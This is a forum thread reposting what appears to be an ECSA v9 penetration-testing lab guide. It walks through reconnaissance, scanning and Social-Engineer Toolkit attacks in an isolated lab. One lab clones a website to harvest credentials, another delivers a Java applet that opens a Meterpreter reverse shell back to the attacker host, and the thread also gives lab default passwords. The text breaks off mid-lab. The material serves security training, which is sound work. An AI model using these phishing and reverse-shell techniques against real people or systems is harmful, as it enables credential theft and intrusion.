Post Reply 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
ECSA v9 Labs
09-14-2017, 03:44 PM
Post: #1
ECSA v9 Labs
Hi,
How can i get ECSA v9 labs guide?
Many thanks
Find all posts by this user
Quote this message in a reply
09-20-2017, 12:38 PM
Post: #2
RE: ECSA v9 Labs
Module 00: ECSAv9 Testing
Objective
Testing
Scenario
Testing

Virtual Machines
1. Windows Server 2012 Subnet A
2. Windows 8 Subnet A
3. Windows Server 2008 Subnet A
4. Windows 7 Subnet A
5. Kali Linux Subnet A
6. Database Server Subnet B
7. Active Directory Subnet C
8. Red Hat Enterprise Linux - Subnet C
9. Web Server Subnet C
10. Accounts Dept Subnet D
11. Advertisement Dept. Subnet D
12. HR Dept Subnet D
13. Sales Department Subnet D
14. Marketing Dept Subnet D
15. NAT Router

Information Gathering
Penetration testing is much more than just running exploits against vulnerable systems. In fact, a penetration test begins before penetration testers have even made contact with the victim's systems. Rather than blindly throwing out exploits and praying that one of them returns a shell, a penetration tester meticulously studies the environment for potential weaknesses and their mitigating factors. By the time a penetration tester runs an exploit, he or she is nearly certain that it will be successful. Since failed exploits can in some cases cause a crash or even damage to the target system, or at the very least make the target un-exploitable in the future, penetration testers won't get the best results, or deliver the most thorough report to their clients, if they blindly turn an automated exploit machine on the target network with no preparation. A penetration tester collects the information of a company such as internal and external links of the company's website, people working in the company, geographical location, DNS information, competitive intelligence, network range etc. This information is collected in order to search for vulnerabilities, so as to exploit and sniff valuable information. In order to become an expert penetration tester and security auditor, you must know various techniques to gather a company's information.

1. Logon to Windows Server 2012 Machine
Select Windows Server 2012 Subnet A from the Machines pane. Go to Machine Commands and click Ctrl + Alt + Delete.
2. Enter the Credentials
In the log on box enter the following Credentials and press Enter:
User Name: Administrator
Password: Pa$$w0rd
You can use the Paste Username and Paste Password options from the Machine Commands menu to enter the user name and password.
3. Close the Server Manager Window
Click the Close button at the top right corner of the Server Manager window.
4. Install Web Data Extractor
Navigate to E:\ECSAv8 Module 08 Information Gathering\Tools for Extracting Company’s Data\Web Data Extractor, double-click wde.exe file and follow the wizard driven installation steps to install Web Data Extractor.
5. Launch Web Data Extractor
Hover the mouse cursor to the lower-left corner of the desktop and click the Start menu icon.
In the Start menu, click Web Data Extractor to launch the application Web Data Extractor.
6. Web Data Extractor Main Window
Web Data Extractor (Web Data Extractor 8.3) main window appears as shown in the following screenshot:
7. Start a New Session
Click New to start a new session.
Session settings window appears as shown in the below screenshot.
8. Customize the Settings
Type a URL (http://www.xsecurity.com) in the Starting URL field.
Check the option Stay within full URL.
Check all the options under Save data section and click OK.
9. Start the Data Extraction
Click Start to initiate the data extraction.
Web Data Extractor will start collecting the information (emails, phones, faxes, etc.). Once the data extraction process is completed, click anywhere on the window. An Information dialog box appears. Click OK.
10. Collect the Extracted Information
The extracted information can be viewed by opening each of the tabs (Meta tags, Emails, Phones, etc.)
11. Collect Meta tags
Select the Meta tags tab to view the URL, Title, Keywords, Description, Host, Domain, and Page size information.
12. Collect Emails
Select Emails tab to view the Email, Name, URL, Title, Host, Keywords density, etc. information related to emails.
13. Collect Phone numbers
Select the Phones tab to view the information related to phone like Phone number, Source, Tag, URL, Title, Host, Keywords density and Keywords on Page.
14. Collect Fax Numbers
Select the Faxes tab to view the information related to fax like Fax, Source, Tag, URL, Title, Host, Keywords density and Keywords on Page.
15. Collect Merged List
Select the Merged List tab to view the information like URL, Host, Domain, Title, Description, Keywords, Email, Phone, Phone Source, Phone tag, Fax, Fax Source and Fax tag on Page.
16. Collect the Urls
Select the Urls tab to view all the URLs extracted.
17. Collect the Inactive Sites
Select the Inactive Sites tab to view all the extracted URLs of the inactive sites.
18. Save the Session
Go to File and click Save session to save the session.
You can also press Ctrl+S on the keyboard to save the session.
19. Specify a Session Name
Save session dialog box appears.
Specify xsecurity as the session name under Please specify session name: text field and click OK.
A session name will be assigned by default. You can either change the name or continue the lab with default name.
20. Save Meta tags
Click Meta tags tab and then click the floppy icon located at the top left corner of the Meta tags section.
21. Information Pop-up
As we are using a demo version of Web Data Extractor, an Information Pop-up appears stating that you cannot save more than 10 records in demo version. Click OK to close the pop-up.
22. Save Meta tags
Save Meta tags window appears, choose a file format and click Save.
The file format chosen in this lab is HTML.
23. Open the Saved File
Navigate to the location C:\Program Files (x86)\WebExtractor\Data\xsecurity.com and double-click metatags_data.html to view the report.
24. Open the Saved File (Cont'd)
The report appears in default browser as shown in the following screenshot:
25. End of the Lab task
In the same way, you need to save the other information related to the target, such as emails, phones and so on.
Website data is successfully collected using Web Data Extractor. Close the Application as well as all the windows that were opened.
26. Monitor Web Updates
Install WebSite-Watcher 2013 tool in order to monitor web updates.
WebSite-Watcher is a program with closed code that tracks changes in the user-defined web pages.
27. Install WebSite-Watcher 2013
Navigate to E:\ECSAv8 Module 08 Information Gathering\Web Updates Monitoring Tools\WebSite-Watcher 2013, double-click wswsetup.exe and follow the wizard driven installation steps to install WebSite-Watcher tool.
28. Install WebSite-Watcher 2013 (Cont'd)
On completion of installation, click Finish.
You may uncheck the Launch Website-Watcher option and click Finish, such that the application does not launch automatically after installation.
29. WebSite-Watcher Main Window
WebSite-Watcher main window (Website-Watcher 2013 (13.0)) appears on the screen along with a Welcome wizard, follow the wizard driven steps.
30. WebSite-Watcher
WebSite-Watcher pop-up appears on the screen, click Continue.
As we are using a trial version of Website-Watcher choose required evaluation option.
31. WebSite-Watcher main window
WebSite-Watcher main window appears as shown in the following screenshot:
32. Wizard: New Bookmark
Click New, a Wizard: New Bookmark window appears.
Select The page can be accessed directly radio button and enter http://www.xsecurity.com as the target company’s URL in URL: text field. Then click Next.
33. Select Page Type Section
The application initializes the page and Select Page Type section appears in the Wizard: New Bookmark window.
Select Webpage radio button and click Next.
34. Finished Section
Finished section appears in the Wizard: New Bookmark window. Click Finish.
35. Monitor the Updates
Double-click the target link http://www.xsecurity.com (third in list) to monitor the updates made in the website.
36. End of the Lab Task
Web updates are successfully monitored using WebSite-Watcher 2013.
Close the application as well as all the windows that are open.
37. Mirror a Website
Install WinHTTrack Web Site Copier in order to mirror a specific website.
HTTrack Website copier allows you to download a World Wide Web site to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.
38. Install WinHTTrack Website Copier
Navigate to E:\ECSAv8 Module 08 Information Gathering\Website Mirroring Tools\HTTrack Web Site Copier, double-click httrack_x64-3.47.24.exe and follow wizard driven installation steps to install HTTrack tool.
39. Install WinHTTrack Website Copier (Cont'd)
On completion of installation, uncheck View history.txt file option and click Finish.
You may uncheck the Launch WinHTTrack Website Copier option and click Finish, such that the application does not launch automatically after installation.
40. About WinHTTrack Website Copier
About WinHTTrack Website Copier pop-up appears along with WinHTTrack Website Copier main window (WinHTTrack Website Copier -[New Project 1]).
Click OK in the pop-up.
41. WinHTTrack Website Copier Main Window
WinHTTrack Website Copier main window appears, click Next.
42. Configure Settings
Enter xsecurity in the New Project name: field, choose info in the Project category: drop-down list, leave the Base path field to default, and click Next.
43. Configure Settings (Cont'd)
Leave Action: field to default, type http://www.xsecurity.com in the Web Address: (URL) field and leave URL list (.txt): and Preferences and mirror options: fields to default. Click Next.
44. Configure Settings (Cont'd)
Check the Disconnect when finished optionand leave the other options to default. Click Finish.
45. Website Download
HTTRack starts copying content from the target company’s website as shown below in the following screenshot:
46. Finish
Once the tool completes mirroring the website, click Finish.
47. Load the Saved File
WinHTTrack Website Copier main window appears, close the application.
Navigate to the location C:\My Web Sites\xsecurity and double-click index.html to view the mirrored website.
48. View the Mirrored Website
The mirrored xsecurity website appears in the default web browser. Browse various webpages in the website in order to examine the website.
49. End of the Lab Task
Website mirroring is successfully done using WinHTTrack Website Copier.
Close the web browser and all the windows that are open.
50. Close the Windows
Close all the windows that were opened while performing the lab.
In this lab, you have learned different techniques to gather information about a company.

Network Route Trace Using Path Analyzer Pro
Access can be gained to an organization's network, which allows a penetration tester to thoroughly learn about the organization's network environment for possible vulnerabilities. Taking all the information gathered into account, penetration testers study the systems to find the best routes of attack. The same tasks can be performed by an attacker and the results possibly will prove to be very fatal for an organization. In such cases, as a penetration tester you should be competent to trace network route, determine network path, and troubleshoot network issues. Here you will be guided to trace the network route using the tool Path Analyzer Pro.

Lab Objectives

The objective of this lab is to help students research email addresses, network paths, and IP addresses. This lab helps to determine what ISP, router, or servers are responsible for a network problem.
1. Logon to Windows Server 2012 Subnet A Machine
Select Windows Server 2012 Subnet A from the Machines pane. Go to Machine Commands and click Ctrl + Alt + Delete.
If you are already logged in to the Windows Server 2012 Subnet A machine, skip to the Step no. 4 of this lab.
2. Enter the Credentials
In the log on box enter the following Credentials and press Enter:
User Name: Administrator
Password: Pa$$w0rd
You can use the Paste Username and Paste Password options from the Machine Commands menu to enter the user name and password.
3. Close the Server Manager Window
Click on close button at the top right corner of the Server Manager window.
4. Install Path Analyzer Pro
To install Path Analyzer Pro, navigate to E:\ECSAv8 Module 08 Information Gathering\Traceroute Tools\Path Analyzer Pro, and double-click on PAPro27.msi.
Follow the wizard driven installation steps to install Path Analyzer Pro.
5. Launch Path Analyzer Pro
To launch Path Analyzer Pro, hover the mouse cursor on the lower-left corner of the desktop and click on Start, then click on Path Analyzer Pro 2.7 app from the menu.
6. Registration Form
Since this is a trial version, Registration Form pop-up appears, click Evaluate button.
7. Main Window of Path Analyzer Pro
The main window of Path Analyzer Pro appears as shown in the following screenshot:
8. Standard Options Section
Select the ICMP protocol in the Standard Options section from the left pane of the window.
9. Advanced Probe Details
Under Advanced Probe Details, check the Smart option in the Length of packet section and leave the rest of the options in this section at their default settings.
Firewall is required to be disabled for appropriate output.
10. Advanced Tracing Details
In the Advanced Tracing Details section, the options are set by default.
Ensure that Stop on control messages (ICMP) option in the Advance Tracing Details section is checked.
11. Perform Trace
To perform the trace after checking these options, select the target IP Address, in this lab we are using Web Server Subnet C machine IP address (10.10.30.3), and ensure that Smart (65535) option under Port field is checked by default.
12. Timed Trace
Now select Timed Trace from the drop-down menu as shown in the following screenshot.
13. Enter the Type Time of Trace
Now click on Trace button. Once you click on Trace button, Type time of trace pop-up appears.
Enter the Type time of trace in mentioned format as HH: MM: SS. Then click on Accept button.
In this lab, trace time entered is 15 seconds.
14. Path Analyzer Pro Perform
While Path Analyzer Pro performs this trace, the Trace button automatically changes to Stop.
15. Report Tab
Click the Report tab to display a linear chart depicting the number of hops between you and the target.
16. Synopsis Tab
Click the Synopsis tab, which displays a one-page summary of your trace results.
17. Charts Tab
Click the Charts tab to view the result of your trace on a chart.
18. Stats Tab
Click the Stats tab, which features the Vital Statistics of your current trace.
19. Log Tab
In Log tab you can able to see the logs recored in the target machine.
20. Export the Report
To export the report, choose a domain (here, Synopsis) and click Export button in menu bar.
21. Save the Report
Save Synopsis As window appears, choose a location where you want to save the file (here, Desktop), specify a File name (10.10.30.3_Synopsis) and click Save.
In the same way, you can generate reports for other domains.
22. Examine the Saved Report
Navigate to Desktop and double-click 10.10.30.3_Synopsis.html.
23. Examine the Saved Report (Cont'd)
The Synopsis report for the Web Server Subnet C machine appears in the default web browser as shown in the following screenshot:
In this lab you have learned how to trace network paths, and IP addresses. This lab helped to determine what ISP, router, or servers are responsible for a network problem.

Gathering Information About a Target Using WhatWeb
WhatWeb identifies websites. It recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
The objective of this lab is to help students learn how to:
Identify the target website technologies
Perform aggressive scans
Log output in an xml format
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch WhatWeb
Go to Applications --> Kali Linux --> Web Applications --> Web Vulnerability Scanners --> whatweb. This launches whatweb application.
5. Scan a Target Website
Assume http://www.xsecurity.com is the target website. In this lab, you will be performing website fingerprinting on this website.
Type the command whatweb http://www.xsecurity.com and press Enter.
6. Analyze the Result
whatweb returns the xsecurity website infrastructure as shown in the following screenshot:
7. Set Verbose
Since the result returned by whatweb is difficult to analyze, you can apply verbosity so that whatweb arranges the result in a clear way.
Type the command whatweb -v http://www.xsecurity.com and press Enter.
8. Analyze the Result
WhatWeb re-arranges the result in a better understandable manner as shown in the following screenshot:
You may set WhatWeb in aggressive mode in order to obtain the version numbers of plugins used in the website.
9. Export the Result
You can export the result returned by WhatWeb. In order to export the result to a text file, type the command whatweb --log-verbose=xsecurity_report http://www.xsecurity.com and press Enter.
This will generate a report with the name xsecurity_report and saves this file in root folder.
10. View the Exported Result
Navigate to root folder in order to find the report containing the result. To open root folder, go to Places --> Home Folder.
11. View the Exported Result (Cont'd)
root folder appears, double-click xsecurity_report.
12. View the Exported Result (Cont'd)
The report appears in the text file as shown in the following screenshot. Analyze the result to get an idea about the website infrastructure.
In this lab, you have learned how to:
• Identify the target website technologies
• Perform aggressive scans
• Log output in an xml format

Perform OS Fingerpriting Using xprobe2
xprobe2 is an active OS fingerprinter. It actually sends probes to the target system, then gauges the OS from the system's response. In total, xprobe2 has 14 different modules it runs to help determine the OS. The objective of this lab is to help students learn how to Perform OS Fingerpring on a target.
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch xprobe2
Go to Applications --> Kali Linux --> Information Gathering --> Live Host Identification --> xprobe2. This launches xprobe2 application.
5. Perform OS Detection
Assume http://www.xsecurity.com is the target website. In this lab, you will be performing OS fingerprinting on the machine hosting this website.
Type the command xprobe2 http://www.xsecurity.com and press Enter.
6. OS Detection Result
xprobe2 returns OS Fingerprinting results as shown in the following screenshot:
xprobe2 returns results as Windows XP (93%) and Windows 2003 Standard Edition (93%), both being the same Windows build. (We personally know that the website is hosted in Windows Server 2008).
7. List xprobe2 Modules
Issuing the -L switch displays all the modules featured in xprobe2.
8. Remove Unwanted Module
You may remove unwanted module while performing OS Fingerprinting. By doing this, you will be able to run xprobe2 in the absence of that particular module.
In this lab, we are removing module no. 2, i.e., ping:tcp_ping.
You can remove this module and perform OS Fingerprinting by issuing the command xprobe2 -D 2 http://www.xsecurity.com.
You can observe that Fingerprinting has been performed in the absence of this module.
9. Generate Report
You may use -o and -X switches to save the result as a report. -o allows you to log the results, while -X saves the result in XML format.
Issue the command xprobe2 -X -o OS_fingerprint http://www.xsecurity.com.
This command will perform OS Fingerprinting on http://www.xsecurity.com and saves the result to an XML file named OS_fingerprint.
The report is saved to root folder by default.
10. Analyze the Report
Navigate to root folder in order to find the report containing the result. To open root folder, go to Places --> Home Folder.
11. Analyze the Report (Cont'd)
root folder appears, double-click OS_fingerprint.
12. Analyze the Report (Cont'd)
The report appears in XML file as shown in the following screenshot. Analyze the result to get an idea about the Operating System on which the the website is hosted.
In this lab, you have learned how to perform OS Fingerpring on a target.

Vulnerability scanning with OpenVAS
While it is debatable how much a vulnerability scanner can do for a professional security tester, they are an important tool for helping us gather data and identify known vulnerabilities. When doing a penetration test we use a vulnerability scanner to provide us with a quick look of the state of the machines we are building in our target database.
The objective of this lab is to help students learn how to:
• Perform Vulnerability Assessment with the OpenVAS tool
• Analyze the output of the scan
• Add information to the target database
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch OpenVAS Scanner
Navigate to Applications --> Backtrack --> Vulnerability Assessment --> Vulnerability Scanners --> OpenVAS --> Start OpenVAS Scanner.
5. Launch OpenVAS Scanner (Cont'd)
Wait until all the services are started.
It takes 2-3 minutes for OpenVas Scanner to start.
Ignore the error returned by OpenVAS Security Manager.
6. Connect to OpenVAS Application
Launch Ice Weasel web browser. Type the URL https://127.0.0.1:9392 in the address bar and press Enter.
OpenVAS web GUI login page appears, enter the following credentials:
Username: admin
Password: toor
7. OpenVAS Homepage
OpenVAS Homepage as shown in the following screenshot:
8. Add a Target
Hover the mouse cursor on Configuration and select Targets.
9. Add a Target (Cont'd)
Click the star icon in order to add a new target.
10. Add a Target (Cont'd)
New Target window appears, enter the target name (Web Server Subnet C in this lab) in the Name text field, select Manual radio button under hosts section and enter the IP address of the target machine in the text field adjacent to Manual radio button. The IP address of Web Server Subnet C is 10.10.30.3.
Select All IANA assigned TCP 2012-02-10 option from the Port List drop-down list.
Leave the other options set to default and click Create Target.
11. Target Added to OpenVAS
A new Target has been added to OpenVas as shown in the following screenshot:
12. Add a New Task
Hover the mouse cursor on Scan Management and click New Task.
13. Add a New Task (Cont'd)
New Task window appears, enter the name of the task (here, Web Serber Subnet C Scan), choose Full and very deep scan from the Scan Config drop-down list and choose Web Server Subnet C from the Scan Targets drop-down list.
Leave the other options set to default and click Create Task.
This creates task which will be performed in the forthcoming steps.
14. Task Added to OpenVAS
The task named Web Server Subnet C Scan has been successfully added to OpenVAS as shown in the following screenshot:
15. Begin Vulnerability Scanning
Begin vulnerability scan by clicking the Start button (first icon in green color) under Actions section.
16. Vulnerability Scan Initiated
Vulnerability scan has been initiated successfully. Now, select Refresh every 10 Sec. option from the drop down list in the Tasks section and click the Refresh button.
By doing this, the scan status displayed under the status section will be updated for every 10 seconds.
17. Vulnerability Scan Completed
It takes 5-10 mintues for the scan to complete. On completion of the scan, the status of the scan changes to Done as shown in the following screenshot:
18. Download the Report
Click on the date link under Reports section. The date (Nov 6 2012) displayed in this lab varies from your lab environment.
The date link may vary as you perform the lab.
19. Download the Report (Cont'd)
Report Summary webpage appears, select HTML from the drop-down list of Full report and click the download button (down arrow button).
This downloads the report in HTML format.
20. View the Report
Opening report pop-up appears, select Open with radio button, choose Iceweasel browser from the drop-down menu and click OK.
21. Examine the Vulnerability Report
Report appears in the web browser. Scroll down the report and examine all the vulnerabilities that are detected during the scan.
In this lab, you have learned how to:
• Perform Vulnerability Assessment with the OpenVAS tool
• Analyze the output of the scan
• Add information to the target database

Web Application Vulnerability Assessment Using Vega
Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS (cross-site scripting), SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: Javascript.
The objective of this lab is to help students to learn how to:
• Use Vega and perform Web Application Vulnerability Assessment
• Generate reports and examine them
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Terminal
Open terminal console by navigating to Applications --> Accessories --> Terminal.
5. Launch Vega Vulnerability Scanner
Type vega in the terminal and press Enter. This launches vega vulnerability scanner.
6. Vega Main Window
Main window of Vega vulnerability scanner appears as shown in the following screenshot:
7. Start a New Scan
Click Scan from the menu bar and select Start New Scan.
8. Start a New Scan (Cont'd)
Select a Scan Target Wizard appears on the screen. Select Enter a base URI for scan radio button under Scan Target section, enter the target URL in the text field and click Next.
The target in this lab is xsecurity, so the URL we enter is goodshopping.xsecurity.com.
goodshopping.xsecurity.com is one of the services of http://www.xsecurity.com.
9. Start a New Scan (Cont'd)
Select Modules section appears, check both Injection Modules and Response Processing Modules options.
By checking these options, all the modules under these options will be selected.
Click Finish.
10. Scan Initiated
Vega scanner begins to perform vulnerability assessment on the target website and lists down the Scan Alert Summary. Wait until the scanning is completed.
11. Examine the Result
On completion of the scan, vega displays the scan alert summary as shown in the following screenshot:
12. Examine the Result (Cont'd)
Expand the nodes associated with the scan, in the left pane under Scan Alerts section and click on a node.
This displays the alerts/ vulnerabilities in web application.
In this lab, the vulnerability is in login.aspx is viewed.
13. Examine the Result (Cont'd)
In the same way, you can expand all the nodes and select on each alert/ vulnerability to view information regarding the selected vulnerability.
14. Save the Scan Result
As Vega vulnerability scanner does not provide option to save the report, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
15. Save the Scan Result (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
16. Save the Scan Result (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named as goodshopping_vuln_high.
the root/ Home folder location has been chosen to save the file.
17. Screenshot Saved
The screenshot has been saved to the home folder as shown in the followig screenshot:
18. End of Lab Task
In the same way, you can take screenshots of all the vulnerabilities found and save them in the root location. Once you have saved all the screenshots, copy all of them to the pentesting folder where you are storing all the scan results.
In this lab, you have learned how to:
• Use and perform Web Application Vulnerability Assessment through Vega
• Generate reports and examine them

Sniffing Website Credentials using Social Engineering Toolkit (SET)
Social-Engineer Toolkit is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. The SET is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. Social Engineering is an ever growing threat to organizations all over the world. Social Engineering attacks are used to compromise companies every day. Even though there are many hacking tools available with underground hacking communities, Social Engineering toolkit is a boon for attackers as it is freely available to perform Spear-phishing attack, Website attack, etc. Attackers can draft email messages and attach malicious file and send them to a large number of people using Spear-phishing attack method. Also, the multi attack method allows utilization of Java applet, Metasploit browser, Credential Harvester/ Tabnabbing etc. all at once.Though numerous sort of attacks can be performed using this toolkit, this is also a must have tool for a Penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and supported heavily within the security community. As an Ethical Hacker, Penetration Tester, or Security Administrator, you should be absolutely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network. The objective of this lab is to help students learn how to:
• Clone a website
• Obtain username and passwords using Tab nabbing method
• Generate reports for conducted penetration test
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Create a Cloned Website
You will be presented with a social engineering toolkit menu.
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Create a Cloned Website (Cont'd)
A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Create a Cloned Website (Cont'd)
In the next menu that appears, type 5 and press Enter to choose Web Jacking Attack Method.
8. Create a Cloned Website (Cont'd)
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. Create a Cloned Website (Cont'd)
Type the IP address of Kali Linux machine in the prompt for “IP address for the POST back in Harvester/Tabnabbing” and press Enter. In this lab, the IP address is 10.10.10.6.
10. Create a Cloned Website (Cont'd)
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used moviescope.xsecurity.com.
By entering the credentials, SET will initiate the cloning of the specified website.
moviescope.xsecurity.com is one of the service of http://www.xsecurity.com.
11. Website Cloned Successfully
SET has successfully cloned the website.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6) through mail or any other means.
In real-time, when a victim clicks the link, he/she will finally be redirected to the cloned website. Whatever the victim types in the login or any other text fields associated to the cloned website, they will be captured by SET and displayed on the SET screen.
12. Log in to Sales Department Subnet D Machine
Select Sales Department Subnet D from the Machines pane and log in to the Admin account of the machine.
13. Browse the Cloned Website
Launch Mozilla Firefox or any other web browser, type the URL http://10.10.10.6 in the address bar and press Enter.
As soon as you enter the URL, you will be displayed with a page containing a notice that the site has been moved. Click on the link.
The web jacking attack method utilizes iframe replacements to make the highlighted URL link to appear legitimate. However, when a victim clicks the link, he/she will be redirected to the cloned website.
14. Log in to the Cloned Website
The cloned website appears on the browser. Assume that you are a user in the moviescope and you have access to the webpage.
Log in to the website using the following credentials:
Username: steve
Password: test
15. moviescope Legitimate Home Page
As soon as you click Login button, you wont be able to login; instead, you will be redirected to the legitimate home/login page of moviescope. You will be able to recognize this by observing the URL in the address bar.
In the meanwhile, SET running on Kali Linux machine harvests the credentials.
16. Credentials Harvested Successfully
Switch to Kali Linux Subnet A machine by selecting it from the Machines pane.
You will be able to view the harvested credentials as shown in the following screenshot:
17. Generate a Report
Once you have successfully gained the credentials of a user account, press Ctrl+C on the keyboard in order to generate the report regarding the harvested credentials.
18. Locate the Generated Report
The reports generated by SET are stored in the location usr/share/set/src/logs in the name harvester.log.
19. Examine the Report
Double-click the harvester.log file to view the result obtained by web jacking attack method.
The report containing the harvested credentials appears as shown in the following screenshot:
In this lab, you have learned how to:
• Clone a website
• Obtain username and passwords using Web Jacking Attack Method
• Generate reports for conducted penetration test

Penetration Testing a Java Vulnerable Machine
Java Signed Applet exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.
The objective of this lab is to help students understand how to:
• Craft a Java Generic Payload
• Perform penetration testing on a Java vulnerable machine
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Choose Social Engineering Attacks
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Choose Website Attack Vectors
A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Choose Java Applet Attack Method
In the next menu that appears, type 1 and press Enter to choose Java Applet Attack Method.
8. Create a Cloned Website
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. NAT/PORT Forwarding
Type no and press Enter, since you are not using NAT/PORT Forwarding.
10. IP Address for Reverse Connection
Type the IP address of Kali Linux Subnet A machine and press Enter.
The IP address for reverse connection, entered in this lab is 10.10.10.6.
The target machine will establish a connection with the machine bearing the IP address 10.10.10.6 (Kali Linux) after it is subjected to exploitation.
11. Create a Cloned Website
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used http://www.xsecurity.com. This will initiate the cloning of the specified website.
12. Choose a Payload
Choose a payload with which you want to exploit the vulnerable target. In this lab, the payload used is Windows Meterpreter Reverse_TCP X64.
As the payload's index number is 7, type 7 and press Enter.
13. Choose the Default Port Number
Simply press Enter to choose the default port number.
14. Payload Handler Initiated
SET now initiates payload handler.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6) through mail or any other means.
In real-time, when a victim clicks the link, the payload will be executed and the attacking machine gains connection with the victim machine.
15. Log in to HR Dept Subnet D
Select HR Dept Subnet D from the Machines pane and log in to it.
16. Browse the Cloned Website
Launch Internet Explorer web browser, type the URL http://10.10.10.6 in the address bar and press Enter.
As soon as you press Enter, a Security Warning pop-up appears on the browser window.
Check I accept the risk and want to run the application option and click Run.
17. Session Established
As soon as you click Run, two meterpreter sessions will be opened. Type Sessions -i 1 or Sessions -i 2 command and press Enter.
Only one among these sessions work and the other fail to work. So, you need to try both of them and proceed with the one you are able to establish a connection and perform post exploitation.
18. Session Established (Cont'd)
In this lab, we have entered the command sessions -i 2 and tried to establish meterpeter session 2.
But the session failed to extract information when we issue sysinfo command. In such case, press Ctrl+Z and enter y to exit the session.
19. Establish a Meterpreter Session
Issue the command sessions -i 1. This will establish a connection with the meterpreter session 1.
Issue any meterpreter command like sysinfo and see whether it is able to return information regarding the target machine. If it establishes connection, it means that the meterpreter session 1 is working and you are able to perform post exploitation on the target machine.
20. Generate a Report
As you can't generate a report in such case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
21. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
22. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named as java_applet_meterpreter.
the root/ Home folder location has been chosen to save the file.
23. Screenshot Saved
The screenshot has been saved to the home folder as shown in the followig screenshot:
In this lab, you have learned how to:
• Craft a Java Generic Payload
• Perform penetration testing on a Java vulnerable machine

Penetration Testing Browser Vulnerabilities in a Machine
The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the ability to clone the website and utilize browser-based exploits. Let’s take a quick look on exploiting a browser exploit through SET.
The objective of this lab is to:
• Generate a Browser Exploit
• Perform Penetration Testing on the Vulnerable Machine
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Choose Social Engineering Attacks
